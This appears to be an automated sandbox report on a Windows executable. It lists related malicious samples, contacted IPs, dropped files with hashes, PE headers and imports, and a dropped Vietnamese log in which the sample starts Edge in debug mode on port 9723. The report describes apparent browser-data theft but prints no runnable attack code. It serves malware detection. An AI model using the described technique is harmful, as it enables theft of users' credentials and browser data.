CLOUDFLARENETUS | DYv2ldz5xT.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | rBFTGm5ioO.exe | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | DYv2ldz5xT.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | rBFTGm5ioO.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | nNnzvybxiy.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | StL9joVVcT.exe | malicious | Unknown | 104.26.12.205
CLOUDFLARENETUS | zbROZPjAQ7.exe | malicious | Unknown | 104.26.12.205
CLOUDFLARENETUS | 6kK89mR2aq.exe | malicious | Unknown | 172.67.74.152
CLOUDFLARENETUS | #U2800.exe | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | http://www.pentamx.com/ | malicious | CAPTCHA Scam ClickFix | 1.1.1.1
                                                                                                                                                                      TUT-ASUSDYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      StL9joVVcT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      zbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                      rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | DYv2ldz5xT.exe | | malicious | Unknown | | 172.65.251.78, 104.26.12.205
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\e_sqlite3.dll | DYv2ldz5xT.exe | | malicious | Unknown | |
 | rBFTGm5ioO.exe | | malicious | Unknown | |
 | DYv2ldz5xT.exe | | malicious | Unknown | |
 | rBFTGm5ioO.exe | | malicious | Unknown | |
 | nNnzvybxiy.exe | | malicious | Unknown | |
 | StL9joVVcT.exe | | malicious | Unknown | |
 | #U2800.exe | | malicious | Unknown | |
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):751624
                                                                                                                                                                                    Entropy (8bit):4.941596949315087
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                    MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                    SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                    SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                    SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):95768
                                                                                                                                                                                    Entropy (8bit):7.998162537514399
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:3kcyrIJHebs0wzUCvL0d7FrIDl0nsVFxyT2sl3a7cv/OHkTiw4Qthnq2jxZ2OFoO:0mJ+phC0d7ey73a6OEmsTnq2jxkOWwi6
                                                                                                                                                                                    MD5:975783A17B48F32292DA195062809182
                                                                                                                                                                                    SHA1:A9A016E5E891C0F09A244C8BFF551498ADEBBDA9
                                                                                                                                                                                    SHA-256:35A8A0C6FFEBE3591EC466B3ED396DD44C17F133BE27088FE613219C6524CAA0
                                                                                                                                                                                    SHA-512:798BE6CE01E86B1D7F5B7BD160BE8B6DBFA0AD88C2E40C149D1984478B6367DEDAB01EB2B9E90B0C20E7B4737B53ACE410932DF22016C81F178883A015DEC69C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                    Entropy (8bit):4.147870920005786
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FiWWltlEkjgh/JVJExcBUDmTKTPr3tlwBVP/Sh/JzvghwRHIsKqJBQIl0:o1Ez/fJPUDmTEdlwBVsJDYOIeBQB
                                                                                                                                                                                    MD5:1C5000AD0701FE4ED9B9F327CC2D8BB2
                                                                                                                                                                                    SHA1:4F73D7F0067F38626D74A787EA8F90C0150998A2
                                                                                                                                                                                    SHA-256:ED48330D993225260EE6794F39B6AAAC2BB1CF24F14763CCB092E24A8B5B6784
                                                                                                                                                                                    SHA-512:A7985E7C460CC045E5CB75B2D1A72F1D642B78A9A6A54B426B4B9B529E80C04C4652361BBD68635F91B0B0FC1CA40F2FBA47A3A34E276DE32D46267221E505C5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):59
                                                                                                                                                                                    Entropy (8bit):4.490457193642897
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m7BATRKSuyEgCV8nnAcV6XAan:m7Bt5vML6XFn
                                                                                                                                                                                    MD5:9413D55C1B5C5E1A1EB60249F843E555
                                                                                                                                                                                    SHA1:EDC3BDC7E1C8AE575B2FD842D19515B328CA0A84
                                                                                                                                                                                    SHA-256:B3170879A34D51315BB4C4621392E4B51E865777583A186A3D557651D8FF4BDF
                                                                                                                                                                                    SHA-512:44BAB8BAFE7C124F68F888464C215F6965C957FA674EC075D8F451A5BBBC2BD5C60325308B34642E1B287B75846F29BF598F1A98D8D2F27B5869916A0CB5CE68
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:9230./devtools/browser/86fe4520-d45e-4c41-b7d5-9038c60c2e1f
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                    File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):663
                                                                                                                                                                                    Entropy (8bit):5.949125862393289
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                    MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                    SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                    SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                                    SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1780736
                                                                                                                                                                                    Entropy (8bit):6.54388973247121
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:izDLT7eXc2a+xMPDBsvh58j6OQ/K4eSlrIBizB2J4bJGtpxnvUmhEocQ0x58:iTTXkMPDjj6O0d1Z9sxnvU3Z
                                                                                                                                                                                    MD5:B1A10828FADDCB586CC3A9C7A01CBBBF
                                                                                                                                                                                    SHA1:1D7EF8581F731D77C9621045C0F2712D654EBEF0
                                                                                                                                                                                    SHA-256:1D2D090188CD500EB6098701690A72F090440162A651123EAB44132525597446
                                                                                                                                                                                    SHA-512:12171C09B03BB2E163561B9B7618B3EC8566D3162A2472A63661A1F86F26118272F3A7C6608C09640D57D992DE52A840DEB41B5EB089E19D35E45D08492ACACF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: DYv2ldz5xT.exe, Detection: malicious
                                                                                                                                                                                    • Filename: rBFTGm5ioO.exe, Detection: malicious
                                                                                                                                                                                    • Filename: nNnzvybxiy.exe, Detection: malicious
                                                                                                                                                                                    • Filename: StL9joVVcT.exe, Detection: malicious
                                                                                                                                                                                    • Filename: #U2800.exe, Detection: malicious
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..B.........A......A......A...+..A............X...*..X......X...................N..........Rich...........................PE..d.....Xg.........." .....*................................................................`A.............................................$......(....`.......`..P............p...... _..T............................_..8............@...............................text....(.......*.................. ..`.rdata......@......................@..@.data............n..................@....pdata..P....`......."..............@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:Microsoft Word 2007+
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16036
                                                                                                                                                                                    Entropy (8bit):7.395550738995465
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:djbGP/uGWZmqibNxt/ZtNNjpVjan+hjregKELqJJJYc:1bGP/uJZ7iBxllNjpVjFFLC
                                                                                                                                                                                    MD5:8D226F80DA462D88E080C6BD6857550C
                                                                                                                                                                                    SHA1:8F543B99D70FFED51B1BF9C6C33791592AAD04FF
                                                                                                                                                                                    SHA-256:0AD7054EDB3D096B1D771D9E1FE393B98E11D2320124A1BEF51FFF9704D834E7
                                                                                                                                                                                    SHA-512:F3CF47989D2BF28F30F7D9867396DF8F270821C6CE298C81A226E943E4E37D194642EA1A192D77FDE9C316B417C4B082B91130A9965C6271B829EA02F895BDC0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                                    Entropy (8bit):4.683895296054431
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MCGGhQsw1hRUDxodsYE+OaagKu:MDbyDxDD+QPu
                                                                                                                                                                                    MD5:B1A198D950CAAC6576528EB8E1A0F2EB
                                                                                                                                                                                    SHA1:4A66288E348B8488D358613500EDB890F351BF0B
                                                                                                                                                                                    SHA-256:81D393E7AAA5C77C90F564E3E4A2CA12F2D891D54137F262D7C69CEE9A76784C
                                                                                                                                                                                    SHA-512:BC6E82AA1EB35DA88E2FF245DCAD515F558D38C763B671849D0F14E8505AAEC4D8EF463BADB034CB970E6BB69DE9CF10A31E0D2F421B8DFE25BA4071967ED62E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    File Type:Non-ISO extended-ASCII text, with CRLF, LF, NEL line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9971
                                                                                                                                                                                    Entropy (8bit):5.100031393950262
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:m4pycbsEWlb3ZssnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsGfuUELdtlnG:uYs7tEpJSxrSVd2hSv+RyI+TM
                                                                                                                                                                                    MD5:82FB1D3F3AF7A0D9780A2D048D33531C
                                                                                                                                                                                    SHA1:B70B095BF163E491B5211217F172CD45CE222C9E
                                                                                                                                                                                    SHA-256:2B258FE3A08B25EC3790E613ED8BDB268879DB599E55BC0453E83DE3E93840BE
                                                                                                                                                                                    SHA-512:667FAB25587E13E8EBD2A429F4D67E7FB76FF6A6C5834DCB0CA7E8F3A47E447FCF0F2ECDE6A24431A544E4588544D4056E0E05CFEEFBC48FE195730CE7310ACF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:Dang t?i file Dual.....? Kh.ng t.m th?y d? li?u ngu?i d.ng cho CocCoc...? Dang x? l. profile Default c?a Edge...?? D. c?p ph.t c?ng 9723 cho Edge - Default..?? D. kh?i ch?y Edge v?i ch? d? debug t?i c?ng 9723...File Dual d. t?i xong t?i: Your_Benefits_and_Role.docx..? Tr.nh duy?t d. s?n s.ng t?i c?ng 9723...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the array...?? Dang ki?m tra c?ng 9723 t?i http://localhost:9723/json..?? L?i kh.ng x.c d?nh t?i c?ng 9723: Index was outside the bounds of the
                                                                                                                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                    Entropy (8bit):6.922133192689838
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                    File name:hJ1bl8p7dJ.exe
                                                                                                                                                                                    File size:26'345'984 bytes
                                                                                                                                                                                    MD5:73d8502f47e5c7b9b4851ee47692105c
                                                                                                                                                                                    SHA1:98efc25148a119cbe7d9b421d4eff9d784c70dcb
                                                                                                                                                                                    SHA256:ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f
                                                                                                                                                                                    SHA512:0d49b8f531acfb8d5c0a8b26d167b27bdcaf85426efc08d84767af7d043406c958198efb7d8c575cdde0bbcf2993baad4f00d315d4e8cb53e0963aae593e02c9
                                                                                                                                                                                    SSDEEP:393216:PiW+4AEgZE3AKFg3kKyNhdYzXUxvlam+mb:aybJNhdYzXUxvgm
                                                                                                                                                                                    TLSH:FA47AE10A3E80A66E4BB9734C575D233CAB1BD625736D60F154CF29A1F73B418A2B732
                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Eu..+&..+&..+&..('..+&../'..+&...'..+&...&..+&..*'..+&..*&I~+&..('..+&../'..+&..+&..+&...'..+&o.+'..+&o.)'..+&Rich..+&.......
                                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                                    Entrypoint:0x140081c20
                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                    Time Stamp:0x6782DDCE [Sat Jan 11 21:08:30 2025 UTC]
                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                    Import Hash:909f404ae07032179af833ba3488037a
                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1be83f0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1be8444 | 0x168 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1ccf000 | 0x5ca | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1c2d000 | 0xa1610 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1cd0000 | 0x1fa4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1a95d40 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1a95f00 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1a95c00 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xc3b000 | 0xcd0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8f0a8 | 0x8f200 | 92bae1c68c77d6ea6599f1fc8d6af263 | False | 0.42769855349344976 | data | 6.670993833104685 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed | 0x91000 | 0x82f538 | 0x82f600 | 4fcd80ee48a273c1013e5fefa574e5d5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated | 0x8c1000 | 0x379b40 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xc3b000 | 0xfaffa4 | 0xfb0000 | c3c116d0af4ee6195e26beb200dee7fd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1beb000 | 0x41af8 | 0xd800 | ba6af6b14abd3ae05cb5e772901bc444 | False | 0.27982132523148145 | data | 5.047550193321382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1c2d000 | 0xa1610 | 0xa1800 | 35bb3a5f46ffcf63a8d77bf0c368e293 | False | 0.49356617647058826 | data | 6.771150075529739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1ccf000 | 0x5ca | 0x600 | 8a873b789d674de2acd28dba2fc43b6e | False | 0.4322916666666667 | data | 4.197636384253982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1cd0000 | 0x1fa4 | 0x2000 | 079f1541473d7592616cedddfe735b2e | False | 0.217529296875 | data | 5.446759262376985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1ccf0a0 | 0x340 | data | | | 0.42427884615384615
RT_MANIFEST | 0x1ccf3e0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
ADVAPI32.dll | RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumKeyExW, RegEnumValueW, GetTokenInformation, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser
bcrypt.dll | BCryptGenRandom, BCryptDecrypt, BCryptExportKey, BCryptFinishHash, BCryptGetProperty, BCryptHashData, BCryptImportKey, BCryptImportKeyPair, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyHash, BCryptCreateHash, BCryptDestroyKey, BCryptEncrypt
CRYPT32.dll | CryptProtectData, CryptUnprotectData, CertFreeCertificateChainEngine, CertCloseStore, PFXImportCertStore, PFXExportCertStore, CryptFindOIDInfo, CryptQueryObject, CryptMsgGetParam, CryptMsgClose, CryptImportPublicKeyInfoEx2, CryptFormatObject, CryptDecodeObject, CertVerifyTimeValidity, CertSetCertificateContextProperty, CertSerializeCertificateStoreElement, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertGetCertificateContextProperty, CryptProtectMemory, CryptUnprotectMemory, CertAddCertificateContextToStore, CertAddCertificateLinkToStore, CertControlStore, CertCreateCertificateChainEngine, CertFindCertificateInStore, CertFindExtension, CertFreeCertificateChain, CertGetCertificateChain, CertGetIntendedKeyUsage, CertGetNameStringW, CertGetValidUsages, CertNameToStrW, CertOpenStore, CertSaveStore
IPHLPAPI.DLL | GetAdaptersAddresses, GetPerAdapterInfo, GetNetworkParams, if_nametoindex
KERNEL32.dll | RtlUnwindEx, RtlPcToFileHeader, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RaiseException, UnhandledExceptionFilter, QueryPerformanceCounter, SetLastError, FormatMessageW, GetLastError, GetCPInfoExW, GetConsoleMode, GetFileType, ReadFile, ReadConsoleW, WriteFile, WriteConsoleW, GetConsoleOutputCP, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetTickCount64, K32EnumProcessModulesEx, CloseHandle, IsWow64Process, GetExitCodeProcess, CreateProcessW, TerminateProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, QueryFullProcessImageNameW, CreatePipe, GetCurrentProcess, GetConsoleCP, GetLogicalDrives, GetProcAddress, LoadLibraryW, LoadLibraryExW, CancelIoEx, CloseThreadpoolIo, GetCurrentProcessId, RaiseFailFastException, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, EnumSystemLocalesEx, ResolveLocaleName, LCIDToLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetCurrentThread, WaitForSingleObject, Sleep, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, InitializeCriticalSection, InitializeConditionVariable, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForMultipleObjectsEx, GetCurrentThreadId, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, GetCPInfo, 
